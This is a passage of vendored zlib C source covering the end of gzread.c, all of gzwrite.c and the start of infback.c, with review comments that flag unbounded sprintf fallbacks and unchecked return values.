gz_error(state, Z_STREAM_ERROR, "internal error: inflate stream corrupt"); return -1; } if (ret == Z_MEM_ERROR) { gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } if (ret == Z_DATA_ERROR) { /* deflate stream invalid */ gz_error(state, Z_DATA_ERROR, strm->msg == NULL ? 
"compressed data error" : strm->msg); return -1; } } while (strm->avail_out && ret != Z_STREAM_END); /* update available output */ state->x.have = had - strm->avail_out; state->x.next = strm->next_out - state->x.have; /* if the gzip stream completed successfully, look for another */ if (ret == Z_STREAM_END) state->how = LOOK; /* good decompression */ return 0; } /* Fetch data and put it in the output buffer. Assumes state->x.have is 0. Data is either copied from the input file or decompressed from the input file depending on state->how. If state->how is LOOK, then a gzip header is looked for to determine whether to copy or decompress. Returns -1 on error, otherwise 0. gz_fetch() will leave state->how as COPY or GZIP unless the end of the input file has been reached and all data has been processed. */ local int gz_fetch(gz_statep state) { z_streamp strm = &(state->strm); do { switch(state->how) { case LOOK: /* -> LOOK, COPY (only if never GZIP), or GZIP */ if (gz_look(state) == -1) return -1; if (state->how == LOOK) return 0; break; case COPY: /* -> COPY */ if (gz_load(state, state->out, state->size << 1, &(state->x.have)) == -1) return -1; state->x.next = state->out; return 0; case GZIP: /* -> GZIP or LOOK (if end of gzip stream) */ strm->avail_out = state->size << 1; strm->next_out = state->out; if (gz_decomp(state) == -1) return -1; } } while (state->x.have == 0 && (!state->eof || strm->avail_in)); return 0; } /* Skip len uncompressed bytes of output. Return -1 on error, 0 on success. */ local int gz_skip(gz_statep state, z_off64_t len) { unsigned n; /* skip over len bytes or reach end-of-file, whichever comes first */ while (len) /* skip over whatever is in output buffer */ if (state->x.have) { n = GT_OFF(state->x.have) || (z_off64_t)state->x.have > len ? 
(unsigned)len : state->x.have; state->x.have -= n; state->x.next += n; state->x.pos += n; len -= n; } /* output buffer empty -- return if we're at the end of the input */ else if (state->eof && state->strm.avail_in == 0) break; /* need more data to skip -- load up output buffer */ else { /* get more output, looking for header if required */ if (gz_fetch(state) == -1) return -1; } return 0; } /* Read len bytes into buf from file, or less than len up to the end of the input. Return the number of bytes read. If zero is returned, either the end of file was reached, or there was an error. state->err must be consulted in that case to determine which. */ local z_size_t gz_read(gz_statep state, voidp buf, z_size_t len) { z_size_t got; unsigned n; /* if len is zero, avoid unnecessary operations */ if (len == 0) return 0; /* process a skip request */ if (state->seek) { state->seek = 0; if (gz_skip(state, state->skip) == -1) return 0; } /* get len bytes to buf, or less than len if at the end */ got = 0; do { /* set n to the maximum amount of len that fits in an unsigned int */ n = (unsigned)-1; if (n > len) n = (unsigned)len; /* first just try copying data from the output buffer */ if (state->x.have) { if (state->x.have < n) n = state->x.have; memcpy(buf, state->x.next, n); state->x.next += n; state->x.have -= n; } /* output buffer empty -- return if we're at the end of the input */ else if (state->eof && state->strm.avail_in == 0) { state->past = 1; /* tried to read past end */ break; } /* need output data -- for small len or new stream load up our output buffer */ else if (state->how == LOOK || n < (state->size << 1)) { /* get more output, looking for header if required */ if (gz_fetch(state) == -1) return 0; continue; /* no progress yet -- go back to copy above */ /* the copy above assures that we will leave with space in the output buffer, allowing at least one gzungetc() to succeed */ } /* large len -- read directly into user buffer */ else if (state->how == COPY) { /* 
read directly */ if (gz_load(state, (unsigned char *)buf, n, &n) == -1) return 0; } /* large len -- decompress directly into user buffer */ else { /* state->how == GZIP */ state->strm.avail_out = n; state->strm.next_out = (unsigned char *)buf; if (gz_decomp(state) == -1) return 0; n = state->x.have; state->x.have = 0; } /* update progress */ len -= n; buf = (char *)buf + n; got += n; state->x.pos += n; } while (len); /* return number of bytes read into user buffer */ return got; } /* -- see zlib.h -- */ int ZEXPORT gzread(gzFile file, voidp buf, unsigned len) { gz_statep state; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return -1; /* since an int is returned, make sure len fits in one, otherwise return with an error (this avoids a flaw in the interface) */ if ((int)len < 0) { gz_error(state, Z_STREAM_ERROR, "request does not fit in an int"); return -1; } /* read len or fewer bytes to buf */ len = (unsigned)gz_read(state, buf, len); /* check for an error */ if (len == 0 && state->err != Z_OK && state->err != Z_BUF_ERROR) return -1; /* return the number of bytes read (this is assured to fit in an int) */ return (int)len; } /* -- see zlib.h -- */ z_size_t ZEXPORT gzfread(voidp buf, z_size_t size, z_size_t nitems, gzFile file) { z_size_t len; gz_statep state; /* get internal structure */ if (file == NULL) return 0; state = (gz_statep)file; /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return 0; /* compute bytes to read -- error on overflow */ len = nitems * size; if (size && len / size != nitems) { gz_error(state, Z_STREAM_ERROR, "request does not fit in a size_t"); return 0; } /* read len or fewer bytes to buf, return the number of full items read */ return len ? 
gz_read(state, buf, len) / size : 0; } /* -- see zlib.h -- */ #ifdef Z_PREFIX_SET # undef z_gzgetc #else # undef gzgetc #endif int ZEXPORT gzgetc(gzFile file) { unsigned char buf[1]; gz_statep state; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return -1; /* try output buffer (no need to check for skip request) */ if (state->x.have) { state->x.have--; state->x.pos++; return *(state->x.next)++; } /* nothing there -- try gz_read() */ return gz_read(state, buf, 1) < 1 ? -1 : buf[0]; } int ZEXPORT gzgetc_(gzFile file) { return gzgetc(file); } /* -- see zlib.h -- */ int ZEXPORT gzungetc(int c, gzFile file) { gz_statep state; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* in case this was just opened, set up the input buffer */ if (state->mode == GZ_READ && state->how == LOOK && state->x.have == 0) (void)gz_look(state); /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return -1; /* process a skip request */ if (state->seek) { state->seek = 0; if (gz_skip(state, state->skip) == -1) return -1; } /* can't push EOF */ if (c < 0) return -1; /* if output buffer empty, put byte at end (allows more pushing) */ if (state->x.have == 0) { state->x.have = 1; state->x.next = state->out + (state->size << 1) - 1; state->x.next[0] = (unsigned char)c; state->x.pos--; state->past = 0; return c; } /* if no room, give up (must have already done a gzungetc()) */ if (state->x.have == (state->size << 1)) { gz_error(state, Z_DATA_ERROR, "out of room to push characters"); return -1; } /* slide output data if needed and insert byte before existing data */ if (state->x.next == state->out) { unsigned char *src = state->out + state->x.have; unsigned char *dest = state->out + 
(state->size << 1); while (src > state->out) *--dest = *--src; state->x.next = dest; } state->x.have++; state->x.next--; state->x.next[0] = (unsigned char)c; state->x.pos--; state->past = 0; return c; } /* -- see zlib.h -- */ char * ZEXPORT gzgets(gzFile file, char *buf, int len) { unsigned left, n; char *str; unsigned char *eol; gz_statep state; /* check parameters and get internal structure */ if (file == NULL || buf == NULL || len < 1) return NULL; state = (gz_statep)file; /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return NULL; /* process a skip request */ if (state->seek) { state->seek = 0; if (gz_skip(state, state->skip) == -1) return NULL; } /* copy output bytes up to new line or len - 1, whichever comes first -- append a terminating zero to the string (we don't check for a zero in the contents, let the user worry about that) */ str = buf; left = (unsigned)len - 1; if (left) do { /* assure that something is in the output buffer */ if (state->x.have == 0 && gz_fetch(state) == -1) return NULL; /* error */ if (state->x.have == 0) { /* end of file */ state->past = 1; /* read past end */ break; /* return what we have */ } /* look for end-of-line in current output buffer */ n = state->x.have > left ? 
left : state->x.have; eol = (unsigned char *)memchr(state->x.next, '\n', n); if (eol != NULL) n = (unsigned)(eol - state->x.next) + 1; /* copy through end-of-line, or remainder if not found */ memcpy(buf, state->x.next, n); state->x.have -= n; state->x.next += n; state->x.pos += n; left -= n; buf += n; } while (left && eol == NULL); /* return terminated string, or if nothing, end of file */ if (buf == str) return NULL; buf[0] = 0; return str; } /* -- see zlib.h -- */ int ZEXPORT gzdirect(gzFile file) { gz_statep state; /* get internal structure */ if (file == NULL) return 0; state = (gz_statep)file; /* if the state is not known, but we can find out, then do so (this is mainly for right after a gzopen() or gzdopen()) */ if (state->mode == GZ_READ && state->how == LOOK && state->x.have == 0) (void)gz_look(state); /* return 1 if transparent, 0 if processing a gzip stream */ return state->direct; } /* -- see zlib.h -- */ int ZEXPORT gzclose_r(gzFile file) { int ret, err; gz_statep state; /* get internal structure */ if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; /* check that we're reading */ if (state->mode != GZ_READ) return Z_STREAM_ERROR; /* free memory and close file */ if (state->size) { inflateEnd(&(state->strm)); free(state->out); free(state->in); } err = state->err == Z_BUF_ERROR ? Z_BUF_ERROR : Z_OK; gz_error(state, Z_OK, NULL); free(state->path); ret = close(state->fd); free(state); return ret ? Z_ERRNO : err; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzwrite.c ================================================ /* gzwrite.c -- zlib functions for writing gzip files * Copyright (C) 2004-2019 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "gzguts.h" /* Initialize state for writing a gzip file. Mark initialization by setting state->size to non-zero. Return -1 on a memory allocation failure, or 0 on success. 
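*/
local int gz_init(gz_statep state) {
    int ret;
    z_streamp strm = &(state->strm);

    /* allocate input buffer (double size for gzprintf) */
    /* NOTE(review): state->want << 1 is unsigned arithmetic and would wrap
       for a very large want; presumably the code that sets state->want
       rejects sizes that cannot be doubled -- confirm against the caller */
    state->in = (unsigned char *)malloc(state->want << 1);
    if (state->in == NULL) {
        gz_error(state, Z_MEM_ERROR, "out of memory");
        return -1;
    }

    /* only need output buffer and deflate state if compressing */
    if (!state->direct) {
        /* allocate output buffer */
        state->out = (unsigned char *)malloc(state->want);
        if (state->out == NULL) {
            free(state->in);
            gz_error(state, Z_MEM_ERROR, "out of memory");
            return -1;
        }

        /* allocate deflate memory, set up for gzip compression */
        strm->zalloc = Z_NULL;
        strm->zfree = Z_NULL;
        strm->opaque = Z_NULL;
        ret = deflateInit2(strm, state->level, Z_DEFLATED,
                           MAX_WBITS + 16, DEF_MEM_LEVEL, state->strategy);
        if (ret != Z_OK) {
            free(state->out);
            free(state->in);
            gz_error(state, Z_MEM_ERROR, "out of memory");
            return -1;
        }
        strm->next_in = NULL;
    }

    /* mark state as initialized */
    state->size = state->want;

    /* initialize write buffer if compressing */
    if (!state->direct) {
        strm->avail_out = state->size;
        strm->next_out = state->out;
        state->x.next = strm->next_out;
    }
    return 0;
}

/* Compress whatever is at avail_in and next_in and write to the output file.
   Return -1 if there is an error writing to the output file or if gz_init()
   fails to allocate memory, otherwise 0. flush is assumed to be a valid
   deflate() flush value. If flush is Z_FINISH, then the deflate() state is
   reset to start a new gzip stream. If state->direct is true, then simply
   write to the output file without compressing, and ignore flush. */
local int gz_comp(gz_statep state, int flush) {
    int ret, writ;
    /* max caps each write() request so the byte count fits in the int that
       receives write()'s result */
    unsigned have, put, max = ((unsigned)-1 >> 2) + 1;
    z_streamp strm = &(state->strm);

    /* allocate memory if this is the first time through */
    if (state->size == 0 && gz_init(state) == -1)
        return -1;

    /* write directly if requested */
    if (state->direct) {
        while (strm->avail_in) {
            put = strm->avail_in > max ? max : strm->avail_in;
            writ = write(state->fd, strm->next_in, put);
            if (writ < 0) {
                gz_error(state, Z_ERRNO, zstrerror());
                return -1;
            }
            /* a short write is not an error: advance by what was accepted
               and loop until the input is drained */
            strm->avail_in -= (unsigned)writ;
            strm->next_in += writ;
        }
        return 0;
    }

    /* check for a pending reset */
    if (state->reset) {
        /* don't start a new gzip member unless there is data to write */
        if (strm->avail_in == 0)
            return 0;
        deflateReset(strm);
        state->reset = 0;
    }

    /* run deflate() on provided input until it produces no more output */
    ret = Z_OK;
    do {
        /* write out current buffer contents if full, or if flushing, but if
           doing Z_FINISH then don't write until we get to Z_STREAM_END */
        if (strm->avail_out == 0 || (flush != Z_NO_FLUSH &&
            (flush != Z_FINISH || ret == Z_STREAM_END))) {
            while (strm->next_out > state->x.next) {
                put = strm->next_out - state->x.next > (int)max ? max :
                      (unsigned)(strm->next_out - state->x.next);
                writ = write(state->fd, state->x.next, put);
                if (writ < 0) {
                    gz_error(state, Z_ERRNO, zstrerror());
                    return -1;
                }
                state->x.next += writ;
            }
            if (strm->avail_out == 0) {
                strm->avail_out = state->size;
                strm->next_out = state->out;
                state->x.next = state->out;
            }
        }

        /* compress */
        have = strm->avail_out;
        ret = deflate(strm, flush);
        if (ret == Z_STREAM_ERROR) {
            gz_error(state, Z_STREAM_ERROR,
                     "internal error: deflate stream corrupt");
            return -1;
        }
        have -= strm->avail_out;
    } while (have);

    /* if that completed a deflate stream, allow another to start */
    if (flush == Z_FINISH)
        state->reset = 1;

    /* all done, no errors */
    return 0;
}

/* Compress len zeros to output. Return -1 on a write error or memory
   allocation failure by gz_comp(), or 0 on success. */
local int gz_zero(gz_statep state, z_off64_t len) {
    int first;
    unsigned n;
    z_streamp strm = &(state->strm);

    /* consume whatever's left in the input buffer */
    if (strm->avail_in && gz_comp(state, Z_NO_FLUSH) == -1)
        return -1;

    /* compress len zeros (len guaranteed > 0) */
    first = 1;
    while (len) {
        /* each pass feeds at most state->size zero bytes */
        n = GT_OFF(state->size) || (z_off64_t)state->size > len ?
            (unsigned)len : state->size;
        if (first) {
            /* the buffer only needs zeroing once; later passes reuse it */
            memset(state->in, 0, n);
            first = 0;
        }
        strm->avail_in = n;
        strm->next_in = state->in;
        state->x.pos += n;
        if (gz_comp(state, Z_NO_FLUSH) == -1)
            return -1;
        len -= n;
    }
    return 0;
}

/* Write len bytes from buf to file. Return the number of bytes written. If
   the returned value is less than len, then there was an error. */
local z_size_t gz_write(gz_statep state, voidpc buf, z_size_t len) {
    z_size_t put = len;

    /* if len is zero, avoid unnecessary operations */
    if (len == 0)
        return 0;

    /* allocate memory if this is the first time through */
    if (state->size == 0 && gz_init(state) == -1)
        return 0;

    /* check for seek request */
    if (state->seek) {
        state->seek = 0;
        if (gz_zero(state, state->skip) == -1)
            return 0;
    }

    /* for small len, copy to input buffer, otherwise compress directly */
    if (len < state->size) {
        /* copy to input buffer, compress when full */
        do {
            unsigned have, copy;

            if (state->strm.avail_in == 0)
                state->strm.next_in = state->in;
            have = (unsigned)((state->strm.next_in + state->strm.avail_in) -
                              state->in);
            /* copy is clamped to the room left in the first state->size
               bytes of the input buffer, then to the caller's length */
            copy = state->size - have;
            if (copy > len)
                copy = (unsigned)len;
            memcpy(state->in + have, buf, copy);
            state->strm.avail_in += copy;
            state->x.pos += copy;
            buf = (const char *)buf + copy;
            len -= copy;
            if (len && gz_comp(state, Z_NO_FLUSH) == -1)
                return 0;
        } while (len);
    }
    else {
        /* consume whatever's left in the input buffer */
        if (state->strm.avail_in && gz_comp(state, Z_NO_FLUSH) == -1)
            return 0;

        /* directly compress user buffer to file */
        state->strm.next_in = (z_const Bytef *)buf;
        do {
            /* avail_in is an unsigned, so a z_size_t length is fed to
               gz_comp() in chunks of at most (unsigned)-1 bytes */
            unsigned n = (unsigned)-1;
            if (n > len)
                n = (unsigned)len;
            state->strm.avail_in = n;
            state->x.pos += n;
            if (gz_comp(state, Z_NO_FLUSH) == -1)
                return 0;
            len -= n;
        } while (len);
    }

    /* input was all buffered or compressed */
    return put;
}

/* -- see zlib.h -- */
/* Write len bytes from buf. Returns the byte count, or 0 when file is NULL,
   the stream is not open for writing, an error is pending, or len does not
   fit in an int. */
int ZEXPORT gzwrite(gzFile file, voidpc buf, unsigned len) {
    gz_statep state;

    /* get internal structure */
    if (file == NULL)
        return 0;
    state = (gz_statep)file;

    /* check that we're writing and that there's no error */
    if (state->mode != GZ_WRITE || state->err != Z_OK)
        return 0;

    /* since an int is returned, make sure len fits in one, otherwise return
       with an error (this avoids a flaw in the interface) */
    if ((int)len < 0) {
        gz_error(state, Z_DATA_ERROR, "requested length does not fit in int");
        return 0;
    }

    /* write len bytes from buf (the return value will fit in an int) */
    return (int)gz_write(state, buf, len);
}

/* -- see zlib.h -- */
/* fwrite()-style wrapper: write nitems items of size bytes each from buf and
   return the number of complete items written. */
z_size_t ZEXPORT gzfwrite(voidpc buf, z_size_t size, z_size_t nitems,
                          gzFile file) {
    z_size_t len;
    gz_statep state;

    /* get internal structure */
    if (file == NULL)
        return 0;
    state = (gz_statep)file;

    /* check that we're writing and that there's no error */
    if (state->mode != GZ_WRITE || state->err != Z_OK)
        return 0;

    /* compute bytes to write -- error on overflow (dividing the product back
       by size detects a wrapped multiplication) */
    len = nitems * size;
    if (size && len / size != nitems) {
        gz_error(state, Z_STREAM_ERROR, "request does not fit in a size_t");
        return 0;
    }

    /* write len bytes from buf, return the number of full items written */
    return len ? gz_write(state, buf, len) / size : 0;
}

/* -- see zlib.h -- */
/* Write the single byte c. Returns c & 0xff on success, -1 on failure. */
int ZEXPORT gzputc(gzFile file, int c) {
    unsigned have;
    unsigned char buf[1];
    gz_statep state;
    z_streamp strm;

    /* get internal structure */
    if (file == NULL)
        return -1;
    state = (gz_statep)file;
    strm = &(state->strm);

    /* check that we're writing and that there's no error */
    if (state->mode != GZ_WRITE || state->err != Z_OK)
        return -1;

    /* check for seek request */
    if (state->seek) {
        state->seek = 0;
        if (gz_zero(state, state->skip) == -1)
            return -1;
    }

    /* try writing to input buffer for speed (state->size == 0 if buffer not
       initialized) */
    if (state->size) {
        if (strm->avail_in == 0)
            strm->next_in = state->in;
        have = (unsigned)((strm->next_in + strm->avail_in) - state->in);
        if (have < state->size) {
            state->in[have] = (unsigned char)c;
            strm->avail_in++;
            state->x.pos++;
            return c & 0xff;
        }
    }

    /* no room in buffer or not initialized, use gz_write() */
    buf[0] = (unsigned char)c;
    if (gz_write(state, buf, 1) != 1)
        return -1;
    return c & 0xff;
}

/* -- see zlib.h -- */
/* Write the NUL-terminated string s without its terminator. Returns the
   string length on success, -1 on failure. */
int ZEXPORT gzputs(gzFile file, const char *s) {
    z_size_t len, put;
    gz_statep state;

    /* get internal structure */
    if (file == NULL)
        return -1;
    state = (gz_statep)file;

    /* check that we're writing and that there's no error */
    if (state->mode != GZ_WRITE || state->err != Z_OK)
        return -1;

    /* write string -- the length must survive both the int return type and
       a round trip through unsigned */
    len = strlen(s);
    if ((int)len < 0 || (unsigned)len != len) {
        gz_error(state, Z_STREAM_ERROR, "string length does not fit in int");
        return -1;
    }
    put = gz_write(state, s, len);
    return put < len ? -1 : (int)len;
}

#if defined(STDC) || defined(Z_HAVE_STDARG_H)
#include <stdarg.h>

/* -- see zlib.h -- */
/* Format into the second half of the double-sized input buffer and queue the
   result for compression. Returns the number of bytes formatted, 0 if the
   output is empty or does not fit in state->size - 1 bytes, or a negative
   zlib error code. format goes straight to the printf family, so callers
   must not pass untrusted data as the format string. */
int ZEXPORTVA gzvprintf(gzFile file, const char *format, va_list va) {
    int len;
    unsigned left;
    char *next;
    gz_statep state;
    z_streamp strm;

    /* get internal structure */
    if (file == NULL)
        return Z_STREAM_ERROR;
    state = (gz_statep)file;
    strm = &(state->strm);

    /* check that we're writing and that there's no error */
    if (state->mode != GZ_WRITE || state->err != Z_OK)
        return Z_STREAM_ERROR;

    /* make sure we have some buffer space */
    if (state->size == 0 && gz_init(state) == -1)
        return state->err;

    /* check for seek request */
    if (state->seek) {
        state->seek = 0;
        if (gz_zero(state, state->skip) == -1)
            return state->err;
    }

    /* do the printf() into the input buffer, put length in len -- the input
       buffer is double-sized just for this function, so there is guaranteed to
       be state->size bytes available after the current contents */
    if (strm->avail_in == 0)
        strm->next_in = state->in;
    next = (char *)(state->in + (strm->next_in - state->in) + strm->avail_in);
    next[state->size - 1] = 0;
#ifdef NO_vsnprintf
    /* NOTE(review): vsprintf() takes no length bound, so in this build a
       result longer than state->size bytes is written past the buffer before
       the check below can notice it. The check is detection after the fact,
       not prevention; prefer builds where vsnprintf() is available. */
#  ifdef HAS_vsprintf_void
    (void)vsprintf(next, format, va);
    for (len = 0; len < state->size; len++)
        if (next[len] == 0) break;
#  else
    len = vsprintf(next, format, va);
#  endif
#else
#  ifdef HAS_vsnprintf_void
    (void)vsnprintf(next, state->size, format, va);
    len = strlen(next);
#  else
    len = vsnprintf(next, state->size, format, va);
#  endif
#endif

    /* check that printf() results fit in buffer -- a negative len becomes a
       large unsigned value and is rejected by the second comparison */
    if (len == 0 || (unsigned)len >= state->size || next[state->size - 1] != 0)
        return 0;

    /* update buffer and position, compress first half if past that */
    strm->avail_in += (unsigned)len;
    state->x.pos += len;
    if (strm->avail_in >= state->size) {
        left = strm->avail_in - state->size;
        strm->avail_in = state->size;
        if (gz_comp(state, Z_NO_FLUSH) == -1)
            return state->err;
        memmove(state->in, state->in + state->size, left);
        strm->next_in = state->in;
        strm->avail_in = left;
    }
    return len;
}

/* Variadic front end: collects the arguments and defers to gzvprintf(). */
int ZEXPORTVA gzprintf(gzFile file, const char *format, ...) {
    va_list va;
    int ret;

    va_start(va, format);
    ret = gzvprintf(file, format, va);
    va_end(va);
    return ret;
}

#else /* !STDC && !Z_HAVE_STDARG_H */

/* -- see zlib.h -- */
/* Fallback for compilers without <stdarg.h>: up to twenty int-sized arguments
   are forwarded to the printf family. Same return convention as gzvprintf().
   format must not come from an untrusted source. */
int ZEXPORTVA gzprintf(gzFile file, const char *format, int a1, int a2, int a3,
                       int a4, int a5, int a6, int a7, int a8, int a9, int a10,
                       int a11, int a12, int a13, int a14, int a15, int a16,
                       int a17, int a18, int a19, int a20) {
    unsigned len, left;
    char *next;
    gz_statep state;
    z_streamp strm;

    /* get internal structure */
    if (file == NULL)
        return Z_STREAM_ERROR;
    state = (gz_statep)file;
    strm = &(state->strm);

    /* check that can really pass pointer in ints */
    if (sizeof(int) != sizeof(void *))
        return Z_STREAM_ERROR;

    /* check that we're writing and that there's no error */
    if (state->mode != GZ_WRITE || state->err != Z_OK)
        return Z_STREAM_ERROR;

    /* make sure we have some buffer space (the error code lives in
       state->err, the field every other function in this file reads) */
    if (state->size == 0 && gz_init(state) == -1)
        return state->err;

    /* check for seek request */
    if (state->seek) {
        state->seek = 0;
        if (gz_zero(state, state->skip) == -1)
            return state->err;
    }

    /* do the printf() into the input buffer, put length in len -- the input
       buffer is double-sized just for this function, so there is guaranteed to
       be state->size bytes available after the current contents */
    if (strm->avail_in == 0)
        strm->next_in = state->in;
    next = (char *)(strm->next_in + strm->avail_in);
    next[state->size - 1] = 0;
#ifdef NO_snprintf
    /* NOTE(review): sprintf() takes no length bound, so in this build a
       result longer than state->size bytes is written past the buffer before
       the check below can notice it; prefer builds with snprintf(). */
#  ifdef HAS_sprintf_void
    sprintf(next, format, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12,
            a13, a14, a15, a16, a17, a18, a19, a20);
    /* scan for the terminator within the buffer half that was reserved */
    for (len = 0; len < state->size; len++)
        if (next[len] == 0)
            break;
#  else
    len = sprintf(next, format, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11,
                  a12, a13, a14, a15, a16, a17, a18, a19, a20);
#  endif
#else
#  ifdef HAS_snprintf_void
    snprintf(next, state->size, format, a1, a2, a3, a4, a5, a6, a7, a8, a9,
             a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20);
    len = strlen(next);
#  else
    len = snprintf(next, state->size, format, a1, a2, a3, a4, a5, a6, a7, a8,
                   a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20);
#  endif
#endif

    /* check that printf() results fit in buffer */
    if (len == 0 || len >= state->size || next[state->size - 1] != 0)
        return 0;

    /* update buffer and position, compress first half if past that */
    strm->avail_in += len;
    state->x.pos += len;
    if (strm->avail_in >= state->size) {
        left = strm->avail_in - state->size;
        strm->avail_in = state->size;
        if (gz_comp(state, Z_NO_FLUSH) == -1)
            return state->err;
        memmove(state->in, state->in + state->size, left);
        strm->next_in = state->in;
        strm->avail_in = left;
    }
    return (int)len;
}

#endif

/* -- see zlib.h -- */
/* Compress pending input with the given flush value. Returns state->err
   after the attempt, or Z_STREAM_ERROR for a bad handle or flush value. */
int ZEXPORT gzflush(gzFile file, int flush) {
    gz_statep state;

    /* get internal structure */
    if (file == NULL)
        return Z_STREAM_ERROR;
    state = (gz_statep)file;

    /* check that we're writing and that there's no error */
    if (state->mode != GZ_WRITE || state->err != Z_OK)
        return Z_STREAM_ERROR;

    /* check flush parameter */
    if (flush < 0 || flush > Z_FINISH)
        return Z_STREAM_ERROR;

    /* check for seek request */
    if (state->seek) {
        state->seek = 0;
        if (gz_zero(state, state->skip) == -1)
            return state->err;
    }

    /* compress remaining data with requested flush; gz_comp() records any
       failure in state->err, which is what gets returned */
    (void)gz_comp(state, flush);
    return state->err;
}

/* -- see zlib.h -- */
/* Change the compression level and strategy for subsequent input. Rejected
   with Z_STREAM_ERROR when the stream is not a compressing writer. */
int ZEXPORT gzsetparams(gzFile file, int level, int strategy) {
    gz_statep state;
    z_streamp strm;

    /* get internal structure */
    if (file == NULL)
        return Z_STREAM_ERROR;
    state = (gz_statep)file;
    strm = &(state->strm);

    /* check that we're writing and that there's no error */
    if (state->mode != GZ_WRITE || state->err != Z_OK || state->direct)
        return Z_STREAM_ERROR;

    /* if no change is requested, then do nothing */
    if (level == state->level && strategy == state->strategy)
        return Z_OK;

    /* check for seek request */
    if (state->seek) {
        state->seek = 0;
        if (gz_zero(state, state->skip) == -1)
            return state->err;
    }

    /* change compression parameters for subsequent input */
    if (state->size) {
        /* flush previous input with previous parameters before changing */
        if (strm->avail_in && gz_comp(state, Z_BLOCK) == -1)
            return state->err;
        /* NOTE(review): the result of deflateParams() is not checked, so
           state->level and state->strategy are updated below even if the
           call rejected the new values */
        deflateParams(strm, level, strategy);
    }
    state->level = level;
    state->strategy = strategy;
    return Z_OK;
}

/* -- see zlib.h -- */
/* Finish the stream, release the buffers and the state, and close the file
   descriptor. The first failure seen is reported, except that a close()
   failure always yields Z_ERRNO. The handle is freed on every path past the
   mode check and must not be used afterwards. */
int ZEXPORT gzclose_w(gzFile file) {
    int ret = Z_OK;
    gz_statep state;

    /* get internal structure */
    if (file == NULL)
        return Z_STREAM_ERROR;
    state = (gz_statep)file;

    /* check that we're writing */
    if (state->mode != GZ_WRITE)
        return Z_STREAM_ERROR;

    /* check for seek request */
    if (state->seek) {
        state->seek = 0;
        if (gz_zero(state, state->skip) == -1)
            ret = state->err;
    }

    /* flush, free memory, and close file */
    if (gz_comp(state, Z_FINISH) == -1)
        ret = state->err;
    if (state->size) {
        if (!state->direct) {
            (void)deflateEnd(&(state->strm));
            free(state->out);
        }
        free(state->in);
    }
    gz_error(state, Z_OK, NULL);
    free(state->path);
    if (close(state->fd) == -1)
        ret = Z_ERRNO;
    free(state);
    return ret;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/infback.c
================================================
/* infback.c -- inflate using a call-back interface
 * Copyright (C) 1995-2022 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

/*
   This code is largely copied from inflate.c. Normally either infback.o or
   inflate.o would be linked into an application--not both. The interface
   with inffast.c is retained so that optimized assembler-coded versions of
   inflate_fast() can be used with either inflate.c or infback.c.
 */

#include "zutil.h"
#include "inftrees.h"
#include "inflate.h"
#include "inffast.h"

/*
   strm provides memory allocation functions in zalloc and zfree, or
   Z_NULL to use the library memory allocation functions.

   windowBits is in the range 8..15, and window is a user-supplied
   window and output buffer that is 2**windowBits bytes.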
*/
int ZEXPORT inflateBackInit_(z_streamp strm, int windowBits,
                             unsigned char FAR *window, const char *version,
                             int stream_size) {
    struct inflate_state FAR *st;

    /* the caller's library version (first character only) and its idea of
       sizeof(z_stream) must both match this build */
    if (version == Z_NULL)
        return Z_VERSION_ERROR;
    if (version[0] != ZLIB_VERSION[0])
        return Z_VERSION_ERROR;
    if (stream_size != (int)(sizeof(z_stream)))
        return Z_VERSION_ERROR;

    /* a stream, a caller-owned window and a window size of 8..15 bits are
       all mandatory */
    if (strm == Z_NULL || window == Z_NULL)
        return Z_STREAM_ERROR;
    if (windowBits < 8 || windowBits > 15)
        return Z_STREAM_ERROR;

    strm->msg = Z_NULL;                 /* in case we return an error */

    /* missing allocator hooks are an error in Z_SOLO builds and are replaced
       by the library defaults otherwise */
#ifdef Z_SOLO
    if (strm->zalloc == (alloc_func)0 || strm->zfree == (free_func)0)
        return Z_STREAM_ERROR;
#else
    if (strm->zalloc == (alloc_func)0) {
        strm->zalloc = zcalloc;
        strm->opaque = (voidpf)0;
    }
    if (strm->zfree == (free_func)0)
        strm->zfree = zcfree;
#endif

    st = (struct inflate_state FAR *)ZALLOC(strm, 1,
                                            sizeof(struct inflate_state));
    if (st == Z_NULL)
        return Z_MEM_ERROR;
    Tracev((stderr, "inflate: allocated\n"));
    strm->state = (struct internal_state FAR *)st;

    /* record the window geometry; the window starts out empty */
    st->window = window;
    st->wbits = (uInt)windowBits;
    st->wsize = 1U << windowBits;
    st->whave = 0;
    st->wnext = 0;
    st->dmax = 32768U;
    st->sane = 1;
    return Z_OK;
}

/*
   Return state with length and distance decoding tables and index sizes set to
   fixed code decoding. Normally this returns fixed tables from inffixed.h.
   If BUILDFIXED is defined, then instead this routine builds the tables the
   first time it's called, and returns those tables the first time and
   thereafter. This reduces the size of the code by about 2K bytes, in
   exchange for a little execution time. However, BUILDFIXED should not be
   used for threaded applications, since the rewriting of the tables and virgin
   may not be thread-safe.
*/
local void fixedtables(struct inflate_state FAR *state) {
#ifdef BUILDFIXED
    static int virgin = 1;
    static code *lenfix, *distfix;
    static code fixed[544];

    /* build fixed huffman tables if first call (may not be thread safe) */
    if (virgin) {
        unsigned idx, root;
        static code *cursor;

